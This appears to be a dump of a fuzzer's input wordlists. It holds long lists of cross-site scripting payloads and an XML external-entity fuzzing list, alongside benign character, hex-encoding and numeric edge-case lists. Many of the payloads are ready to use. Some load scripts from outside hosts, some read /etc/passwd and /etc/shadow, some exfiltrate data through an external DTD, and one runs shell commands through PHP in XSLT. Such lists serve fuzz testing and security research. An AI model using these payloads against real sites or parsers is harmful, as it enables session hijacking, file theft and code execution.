"autofocus/onfocus=alert(1)// 5 | '-alert(1)-' 6 | '-alert(1)// 7 | \'-alert(1)// 8 | </script><svg onload=alert(1)> 9 | <x contenteditable onblur=alert(1)>lose focus! 10 | <x onclick=alert(1)>click this! 11 | <x oncopy=alert(1)>copy this! 12 | <x oncontextmenu=alert(1)>right click this! 13 | <x oncut=alert(1)>copy this! 14 | <x ondblclick=alert(1)>double click this! 15 | <x ondrag=alert(1)>drag this! 16 | <x contenteditable onfocus=alert(1)>focus this! 17 | <x contenteditable oninput=alert(1)>input here! 18 | <x contenteditable onkeydown=alert(1)>press any key! 19 | <x contenteditable onkeypress=alert(1)>press any key! 20 | <x contenteditable onkeyup=alert(1)>press any key! 21 | <x onmousedown=alert(1)>click this! 
22 | <x onmousemove=alert(1)>hover this! 23 | <x onmouseout=alert(1)>hover this! 24 | <x onmouseover=alert(1)>hover this! 25 | <x onmouseup=alert(1)>click this! 26 | <x contenteditable onpaste=alert(1)>paste here! 27 | <script>alert(1)// 28 | <script>alert(1)<!– 29 | <script src=//brutelogic.com.br/1.js> 30 | <script src=//3334957647/1> 31 | %3Cx onxxx=alert(1) 32 | <%78 onxxx=1 33 | <x %6Fnxxx=1 34 | <x o%6Exxx=1 35 | <x on%78xx=1 36 | <x onxxx%3D1 37 | <X onxxx=1 38 | <x OnXxx=1 39 | <X OnXxx=1 40 | <x onxxx=1 onxxx=1 41 | <x/onxxx=1 42 | <x%09onxxx=1 43 | <x%0Aonxxx=1 44 | <x%0Conxxx=1 45 | <x%0Donxxx=1 46 | <x%2Fonxxx=1 47 | <x 1='1'onxxx=1 48 | <x 1="1"onxxx=1 49 | <x </onxxx=1 50 | <x 1=">" onxxx=1 51 | <http://onxxx%3D1/ 52 | <x onxxx=alert(1) 1=' 53 | <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)> 54 | 'onload=alert(1)><svg/1=' 55 | '>alert(1)</script><script/1=' 56 | */alert(1)</script><script>/* 57 | */alert(1)">'onload="/*<svg/1=' 58 | `-alert(1)">'onload="`<svg/1=' 59 | */</script>'>alert(1)/*<script/1=' 60 | <script>alert(1)</script> 61 | <script src=javascript:alert(1)> 62 | <iframe src=javascript:alert(1)> 63 | <embed src=javascript:alert(1)> 64 | <a href=javascript:alert(1)>click 65 | <math><brute href=javascript:alert(1)>click 66 | <form action=javascript:alert(1)><input type=submit> 67 | <isindex action=javascript:alert(1) type=submit value=click> 68 | <form><button formaction=javascript:alert(1)>click 69 | <form><input formaction=javascript:alert(1) type=submit value=click> 70 | <form><input formaction=javascript:alert(1) type=image value=click> 71 | <form><input formaction=javascript:alert(1) type=image src=SOURCE> 72 | <isindex formaction=javascript:alert(1) type=submit value=click> 73 | <object data=javascript:alert(1)> 74 | <iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> 75 | <svg><script xlink:href=data:,alert(1) /> 76 | <math><brute 
xlink:href=javascript:alert(1)>click 77 | <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> 78 | <html ontouchstart=alert(1)> 79 | <html ontouchend=alert(1)> 80 | <html ontouchmove=alert(1)> 81 | <html ontouchcancel=alert(1)> 82 | <body onorientationchange=alert(1)> 83 | "><img src=1 onerror=alert(1)>.gif 84 | <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> 85 | GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; 86 | <script src="data:&comma;alert(1)// 87 | "><script src=data:&comma;alert(1)// 88 | <script src="//brutelogic.com.br&sol;1.js&num; 89 | "><script src=//brutelogic.com.br&sol;1.js&num; 90 | <link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; 91 | "><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; 92 | <base href=//0> 93 | <script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1) 94 | <body onload=alert(1)> 95 | <body onpageshow=alert(1)> 96 | <body onfocus=alert(1)> 97 | <body onhashchange=alert(1)><a href=#x>click this!#x 98 | <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x 99 | <body onscroll=alert(1)><br><br><br><br> 100 | <br><br><br><br><br><br><br><br><br><br> 101 | <br><br><br><br><br><br><br><br><br><br> 102 | <br><br><br><br><br><br><x id=x>#x 103 | <body onresize=alert(1)>press F12! 104 | <body onhelp=alert(1)>press F1! (MSIE) 105 | <marquee onstart=alert(1)> 106 | <marquee loop=1 width=0 onfinish=alert(1)> 107 | <audio src onloadstart=alert(1)> 108 | <video onloadstart=alert(1)><source> 109 | <input autofocus onblur=alert(1)> 110 | <keygen autofocus onfocus=alert(1)> 111 | <form onsubmit=alert(1)><input type=submit> 112 | <select onchange=alert(1)><option>1<option>2 113 | <menu id=x contextmenu=x onshow=alert(1)>right click me! 
114 | -------------------------------------------------------------------------------- /examples/nasty/XSS-RSNAKE.txt: -------------------------------------------------------------------------------- 1 | # credit to rsnake 2 | <SCRIPT>alert('XSS');</SCRIPT> 3 | '';!--"<XSS>=&{()} 4 | <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> 5 | <IMG SRC="javascript:alert('XSS');"> 6 | <IMG SRC=javascript:alert('XSS')> 7 | <IMG SRC=JaVaScRiPt:alert('XSS')> 8 | <IMG SRC=javascript:alert(&quot;XSS&quot;)> 9 | <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> 10 | <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> 11 | SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> 12 | <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> 13 | <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> 14 | <IMG SRC="jav ascript:alert('XSS');"> 15 | <IMG SRC="jav&#x09;ascript:alert('XSS');"> 16 | <IMG SRC="jav&#x0A;ascript:alert('XSS');"> 17 | <IMG SRC="jav&#x0D;ascript:alert('XSS');"> 18 | <IMG SRC=" &#14; javascript:alert('XSS');"> 19 | <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> 20 | <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> 21 | <IMG SRC="javascript:alert('XSS')" 22 | <SCRIPT>a=/XSS/ 23 | \";alert('XSS');// 24 | <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> 25 | <BODY BACKGROUND="javascript:alert('XSS')"> 26 | <BODY ONLOAD=alert('XSS')> 27 | <IMG DYNSRC="javascript:alert('XSS')"> 28 | <IMG LOWSRC="javascript:alert('XSS')"> 29 | <BGSOUND SRC="javascript:alert('XSS');"> 30 | <BR SIZE="&{alert('XSS')}"> 31 | <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> 32 | <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> 33 | <LINK REL="stylesheet" 
HREF="http://ha.ckers.org/xss.css"> 34 | <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> 35 | <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> 36 | <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> 37 | <IMG SRC='vbscript:msgbox("XSS")'> 38 | <IMG SRC="mocha:[code]"> 39 | <IMG SRC="livescript:[code]"> 40 | <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> 41 | <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> 42 | <META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet"> 43 | <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> 44 | <IFRAME SRC="javascript:alert('XSS');"></IFRAME> 45 | <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> 46 | <TABLE BACKGROUND="javascript:alert('XSS')"> 47 | <DIV STYLE="background-image: url(javascript:alert('XSS'))"> 48 | <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> 49 | <DIV STYLE="width: expression(alert('XSS'));"> 50 | <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> 51 | <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> 52 | <XSS STYLE="xss:expression(alert('XSS'))"> 53 | exp/*<XSS STYLE='no\xss:noxss("*//*"); 54 | <STYLE TYPE="text/javascript">alert('XSS');</STYLE> 55 | <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> 56 | <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> 57 | <BASE HREF="javascript:alert('XSS');//"> 58 | <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> 59 | <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> 60 | getURL("javascript:alert('XSS')") 61 | a="get"; 62 | <!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');"> 63 | <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> 64 | <HTML><BODY> 
65 | <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> 66 | <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> 67 | <? echo('<SCR)'; 68 | <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> 69 | <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- 70 | <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 71 | <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> 72 | <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> 73 | <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> 74 | <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> 75 | -------------------------------------------------------------------------------- /examples/nasty/XXE-Fuzzing.txt: -------------------------------------------------------------------------------- 1 | <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" > 2 | <?xml version="1.0" encoding="ISO-8859-1"?> 3 | <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> 4 | <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> 5 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> 6 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> 7 | <?xml version="1.0" encoding="ISO-8859-1"?><test></test> 8 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> 9 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 10 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo> 11 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]> 12 
| <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> 13 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]> 14 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> 15 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]> 16 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com:80" >]><foo>&xxe;</foo> 17 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example:443" >]> 18 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo> 19 | <test></test> 20 | <![CDATA[<test></test>]]> 21 | &foo; 22 | %foo; 23 | count(/child::node()) 24 | x' or name()='username' or 'x'='y 25 | <name>','')); phpinfo(); exit;/*</name> 26 | <![CDATA[<script>var n=0;while(true){n++;}</script>]]> 27 | <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> 28 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 29 | <foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 30 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo> 31 | <foo><![CDATA[' or 1=1 or ''=']]></foo> 32 | <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> 33 | <xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 34 | <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I 
DATAFLD=C DATAFORMATAS=HTML></SPAN> 35 | <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 36 | <xml SRC="xsstest.xml" ID=I></xml> 37 | <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> 38 | <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> 39 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><script>alert(123)</script></xsl:template></xsl:stylesheet> 40 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:copy-of select="document('/etc/passwd')"/></xsl:template></xsl:stylesheet> 41 | <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:value-of select="php:function('passthru','ls -la')"/></xsl:template></xsl:stylesheet> 42 | <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 43 | <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]> 44 | <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]> 45 | <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]> 46 | <!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]> 47 | <!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://127.0.0.1:80/?%file;'>  "> %int; 48 | <!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://127.0.0.1:21/%data3;'>"> 49 | <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]> 50 | <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]> 51 | <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body> 52 | 
-------------------------------------------------------------------------------- /examples/nasty/alphanum-case-extra.txt: -------------------------------------------------------------------------------- 1 | ! 2 | " 3 | # 4 | $ 5 | % 6 | & 7 | ' 8 | ( 9 | ) 10 | * 11 | + 12 | , 13 | - 14 | . 15 | / 16 | 0 17 | 1 18 | 2 19 | 3 20 | 4 21 | 5 22 | 6 23 | 7 24 | 8 25 | 9 26 | : 27 | ; 28 | < 29 | = 30 | > 31 | ? 32 | @ 33 | A 34 | B 35 | C 36 | D 37 | E 38 | F 39 | G 40 | H 41 | I 42 | J 43 | K 44 | L 45 | M 46 | N 47 | O 48 | P 49 | Q 50 | R 51 | S 52 | T 53 | U 54 | V 55 | W 56 | X 57 | Y 58 | Z 59 | [ 60 | \ 61 | ] 62 | ^ 63 | _ 64 | ` 65 | a 66 | b 67 | c 68 | d 69 | e 70 | f 71 | g 72 | h 73 | i 74 | j 75 | k 76 | l 77 | m 78 | n 79 | o 80 | p 81 | q 82 | r 83 | s 84 | t 85 | u 86 | v 87 | w 88 | x 89 | y 90 | z 91 | { 92 | | 93 | } 94 | ~ 95 | 96 | -------------------------------------------------------------------------------- /examples/nasty/alphanum-case.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 1 3 | 2 4 | 3 5 | 4 6 | 5 7 | 6 8 | 7 9 | 8 10 | 9 11 | a 12 | b 13 | c 14 | d 15 | e 16 | f 17 | g 18 | h 19 | i 20 | j 21 | k 22 | l 23 | m 24 | n 25 | o 26 | p 27 | q 28 | r 29 | s 30 | t 31 | u 32 | v 33 | w 34 | x 35 | y 36 | z 37 | A 38 | B 39 | C 40 | D 41 | E 42 | F 43 | G 44 | H 45 | I 46 | J 47 | K 48 | L 49 | M 50 | N 51 | O 52 | P 53 | Q 54 | R 55 | S 56 | T 57 | U 58 | V 59 | W 60 | X 61 | Y 62 | Z 63 | -------------------------------------------------------------------------------- /examples/nasty/char.txt: -------------------------------------------------------------------------------- 1 | a 2 | b 3 | c 4 | d 5 | e 6 | f 7 | g 8 | h 9 | i 10 | j 11 | k 12 | l 13 | m 14 | n 15 | o 16 | p 17 | q 18 | r 19 | s 20 | t 21 | u 22 | v 23 | w 24 | x 25 | y 26 | z 27 | -------------------------------------------------------------------------------- /examples/nasty/doble-uri-hex.txt: 
-------------------------------------------------------------------------------- 1 | %2500 2 | %2501 3 | %2502 4 | %2503 5 | %2504 6 | %2505 7 | %2506 8 | %2507 9 | %2508 10 | %2509 11 | %250a 12 | %250b 13 | %250c 14 | %250d 15 | %250e 16 | %250f 17 | %2510 18 | %2511 19 | %2512 20 | %2513 21 | %2514 22 | %2515 23 | %2516 24 | %2517 25 | %2518 26 | %2519 27 | %251a 28 | %251b 29 | %251c 30 | %251d 31 | %251e 32 | %251f 33 | %2520 34 | %2521 35 | %2522 36 | %2523 37 | %2524 38 | %2525 39 | %2526 40 | %2527 41 | %2528 42 | %2529 43 | %252a 44 | %252b 45 | %252c 46 | %252d 47 | %252e 48 | %252f 49 | %2530 50 | %2531 51 | %2532 52 | %2533 53 | %2534 54 | %2535 55 | %2536 56 | %2537 57 | %2538 58 | %2539 59 | %253a 60 | %253b 61 | %253c 62 | %253d 63 | %253e 64 | %253f 65 | %2540 66 | %2541 67 | %2542 68 | %2543 69 | %2544 70 | %2545 71 | %2546 72 | %2547 73 | %2548 74 | %2549 75 | %254a 76 | %254b 77 | %254c 78 | %254d 79 | %254e 80 | %254f 81 | %2550 82 | %2551 83 | %2552 84 | %2553 85 | %2554 86 | %2555 87 | %2556 88 | %2557 89 | %2558 90 | %2559 91 | %255a 92 | %255b 93 | %255c 94 | %255d 95 | %255e 96 | %255f 97 | %2560 98 | %2561 99 | %2562 100 | %2563 101 | %2564 102 | %2565 103 | %2566 104 | %2567 105 | %2568 106 | %2569 107 | %256a 108 | %256b 109 | %256c 110 | %256d 111 | %256e 112 | %256f 113 | %2570 114 | %2571 115 | %2572 116 | %2573 117 | %2574 118 | %2575 119 | %2576 120 | %2577 121 | %2578 122 | %2579 123 | %257a 124 | %257b 125 | %257c 126 | %257d 127 | %257e 128 | %257f 129 | %2580 130 | %2581 131 | %2582 132 | %2583 133 | %2584 134 | %2585 135 | %2586 136 | %2587 137 | %2588 138 | %2589 139 | %258a 140 | %258b 141 | %258c 142 | %258d 143 | %258e 144 | %258f 145 | %2590 146 | %2591 147 | %2592 148 | %2593 149 | %2594 150 | %2595 151 | %2596 152 | %2597 153 | %2598 154 | %2599 155 | %259a 156 | %259b 157 | %259c 158 | %259d 159 | %259e 160 | %259f 161 | %25a0 162 | %25a1 163 | %25a2 164 | %25a3 165 | %25a4 166 | %25a5 167 | %25a6 168 | %25a7 169 | 
%25a8 170 | %25a9 171 | %25aa 172 | %25ab 173 | %25ac 174 | %25ad 175 | %25ae 176 | %25af 177 | %25b0 178 | %25b1 179 | %25b2 180 | %25b3 181 | %25b4 182 | %25b5 183 | %25b6 184 | %25b7 185 | %25b8 186 | %25b9 187 | %25ba 188 | %25bb 189 | %25bc 190 | %25bd 191 | %25be 192 | %25bf 193 | %25c0 194 | %25c1 195 | %25c2 196 | %25c3 197 | %25c4 198 | %25c5 199 | %25c6 200 | %25c7 201 | %25c8 202 | %25c9 203 | %25ca 204 | %25cb 205 | %25cc 206 | %25cd 207 | %25ce 208 | %25cf 209 | %25d0 210 | %25d1 211 | %25d2 212 | %25d3 213 | %25d4 214 | %25d5 215 | %25d6 216 | %25d7 217 | %25d8 218 | %25d9 219 | %25da 220 | %25db 221 | %25dc 222 | %25dd 223 | %25de 224 | %25df 225 | %25e0 226 | %25e1 227 | %25e2 228 | %25e3 229 | %25e4 230 | %25e5 231 | %25e6 232 | %25e7 233 | %25e8 234 | %25e9 235 | %25ea 236 | %25eb 237 | %25ec 238 | %25ed 239 | %25ee 240 | %25ef 241 | %25f0 242 | %25f1 243 | %25f2 244 | %25f3 245 | %25f4 246 | %25f5 247 | %25f6 248 | %25f7 249 | %25f8 250 | %25f9 251 | %25fa 252 | %25fb 253 | %25fc 254 | %25fd 255 | %25fe 256 | %25ff 257 | -------------------------------------------------------------------------------- /examples/nasty/lol: -------------------------------------------------------------------------------- 1 | 𝓣𝓱𝓮.𝓺𝓾𝓲𝓬𝓴.𝓫𝓻𝓸𝔀𝓷.𝓯𝓸𝔁.𝓳𝓾𝓶𝓹𝓼.𝓸𝓿𝓮𝓻.𝓽𝓱𝓮.𝓵𝓪𝔃𝔂.𝓭𝓸𝓰 2 | -------------------------------------------------------------------------------- /examples/nasty/numeric-fields-only.txt: -------------------------------------------------------------------------------- 1 | 16649142472222295162770764775 2 | 2.07564741538e+16 3 | 3.38800266804e+16 4 | -139333426276771806651771 5 | -1.97684995314e+16 6 | 0x481b49d0f8d5a3e7f821066157c37c 7 | 9223372036854775807 8 | 9223372036854775808 9 | -9223372036854775809 10 | 1.79769313486e+308 11 | 1.79769313486e+308 12 | 2139095040 13 | 2.22507385851e-308 14 | 79228162514264337593543950336L 15 | 79228162514264337593543950336l 16 | 79228162514264337593543950336B 17 | inf 18 | Infinity 19 | -Infinity 20 | NaN 21 | 255 22 | 65535 
23 | 4294967295 24 | 18446744073709551615 25 | 256 26 | 65536 27 | 4294967296 28 | 18446744073709551616 29 | 127 30 | 32767 31 | 2147483647 32 | 9223372036854775807 33 | 128 34 | 32768 35 | 2147483648 36 | 9223372036854775808 37 | -128 38 | -32768 39 | -2147483648 40 | -9223372036854775808 41 | -129 42 | -32769 43 | -2147483649 44 | -9223372036854775809 45 | -------------------------------------------------------------------------------- /examples/nasty/special-chars.txt: -------------------------------------------------------------------------------- 1 | ~ 2 | ! 3 | @ 4 | # 5 | $ 6 | % 7 | ^ 8 | & 9 | * 10 | ( 11 | ) 12 | _ 13 | _ 14 | + 15 | = 16 | { 17 | } 18 | ] 19 | [ 20 | | 21 | \ 22 | ` 23 | , 24 | . 25 | / 26 | ? 27 | ; 28 | : 29 | ' 30 | " 31 | < 32 | > 33 | -------------------------------------------------------------------------------- /examples/nasty/uri-hex.txt: -------------------------------------------------------------------------------- 1 | %00 2 | %01 3 | %02 4 | %03 5 | %04 6 | %05 7 | %06 8 | %07 9 | %08 10 | %09 11 | %0a 12 | %0b 13 | %0c 14 | %0d 15 | %0e 16 | %0f 17 | %10 18 | %11 19 | %12 20 | %13 21 | %14 22 | %15 23 | %16 24 | %17 25 | %18 26 | %19 27 | %1a 28 | %1b 29 | %1c 30 | %1d 31 | %1e 32 | %1f 33 | %20 34 | %21 35 | %22 36 | %23 37 | %24 38 | %25 39 | %26 40 | %27 41 | %28 42 | %29 43 | %2a 44 | %2b 45 | %2c 46 | %2d 47 | %2e 48 | %2f 49 | %30 50 | %31 51 | %32 52 | %33 53 | %34 54 | %35 55 | %36 56 | %37 57 | %38 58 | %39 59 | %3a 60 | %3b 61 | %3c 62 | %3d 63 | %3e 64 | %3f 65 | %40 66 | %41 67 | %42 68 | %43 69 | %44 70 | %45 71 | %46 72 | %47 73 | %48 74 | %49 75 | %4a 76 | %4b 77 | %4c 78 | %4d 79 | %4e 80 | %4f 81 | %50 82 | %51 83 | %52 84 | %53 85 | %54 86 | %55 87 | %56 88 | %57 89 | %58 90 | %59 91 | %5a 92 | %5b 93 | %5c 94 | %5d 95 | %5e 96 | %5f 97 | %60 98 | %61 99 | %62 100 | %63 101 | %64 102 | %65 103 | %66 104 | %67 105 | %68 106 | %69 107 | %6a 108 | %6b 109 | %6c 110 | %6d 111 | %6e 112 | %6f 113 | %70 114 | 
%71 115 | %72 116 | %73 117 | %74 118 | %75 119 | %76 120 | %77 121 | %78 122 | %79 123 | %7a 124 | %7b 125 | %7c 126 | %7d 127 | %7e 128 | %7f 129 | %80 130 | %81 131 | %82 132 | %83 133 | %84 134 | %85 135 | %86 136 | %87 137 | %88 138 | %89 139 | %8a 140 | %8b 141 | %8c 142 | %8d 143 | %8e 144 | %8f 145 | %90 146 | %91 147 | %92 148 | %93 149 | %94 150 | %95 151 | %96 152 | %97 153 | %98 154 | %99 155 | %9a 156 | %9b 157 | %9c 158 | %9d 159 | %9e 160 | %9f 161 | %a0 162 | %a1 163 | %a2 164 | %a3 165 | %a4 166 | %a5 167 | %a6 168 | %a7 169 | %a8 170 | %a9 171 | %aa 172 | %ab 173 | %ac 174 | %ad 175 | %ae 176 | %af 177 | %b0 178 | %b1 179 | %b2 180 | %b3 181 | %b4 182 | %b5 183 | %b6 184 | %b7 185 | %b8 186 | %b9 187 | %ba 188 | %bb 189 | %bc 190 | %bd 191 | %be 192 | %bf 193 | %c0 194 | %c1 195 | %c2 196 | %c3 197 | %c4 198 | %c5 199 | %c6 200 | %c7 201 | %c8 202 | %c9 203 | %ca 204 | %cb 205 | %cc 206 | %cd 207 | %ce 208 | %cf 209 | %d0 210 | %d1 211 | %d2 212 | %d3 213 | %d4 214 | %d5 215 | %d6 216 | %d7 217 | %d8 218 | %d9 219 | %da 220 | %db 221 | %dc 222 | %dd 223 | %de 224 | %df 225 | %e0 226 | %e1 227 | %e2 228 | %e3 229 | %e4 230 | %e5 231 | %e6 232 | %e7 233 | %e8 234 | %e9 235 | %ea 236 | %eb 237 | %ec 238 | %ed 239 | %ee 240 | %ef 241 | %f0 242 | %f1 243 | %f2 244 | %f3 245 | %f4 246 | %f5 247 | %f6 248 | %f7 249 | %f8 250 | %f9 251 | %fa 252 | %fb 253 | %fc 254 | %fd 255 | %fe 256 | %ff 257 | -------------------------------------------------------------------------------- /examples/specific/blank.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/examples/specific/blank.txt -------------------------------------------------------------------------------- /examples/specific/chrome_t.txt: -------------------------------------------------------------------------------- 1 | --ash-force-desktop 2 | --disable-3d-apis 3 | 
